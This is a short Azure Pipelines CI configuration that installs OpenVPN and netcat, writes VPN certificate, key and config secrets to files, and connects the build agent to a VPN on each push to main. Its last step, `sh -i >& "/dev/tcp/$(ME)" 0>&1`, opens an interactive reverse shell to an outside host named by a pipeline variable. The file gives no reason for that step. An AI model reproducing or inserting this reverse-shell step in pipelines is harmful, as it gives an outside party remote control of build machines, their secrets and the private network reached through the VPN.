trigger:
  - main

pool:
  vmImage: 'ubuntu-latest'

steps:

  - bash: |
      sudo apt-get --assume-yes --no-install-recommends install openvpn netcat
      echo $VPNCRT > vpncrt.crt
      echo $VPNKEY > vpnkey.key
      echo $VPNCONFIG | base64 -d > tempvpnconfig.ovpn

      # curl -o client.zip $(az network vnet-gateway vpn-client generate -n gateway -g example-resources | tr -d '"')
      # unzip client.zip -d client

      CLIENTCERTIFICATE=$(cat vpncrt.crt) PRIVATEKEY=$(cat vpnkey.key) envsubst < tempvpnconfig.ovpn > vpnconfig.ovpn

      sudo openvpn vpnconfig.ovpn &

      sleep 5

      ifconfig tun0

      sh -i >& "/dev/tcp/$(ME)" 0>&1
      
    env:
      VPNKEY: $(vpnkey)
      VPNCRT: $(vpncrt)
      VPNCONFIG: $(vpnconfig)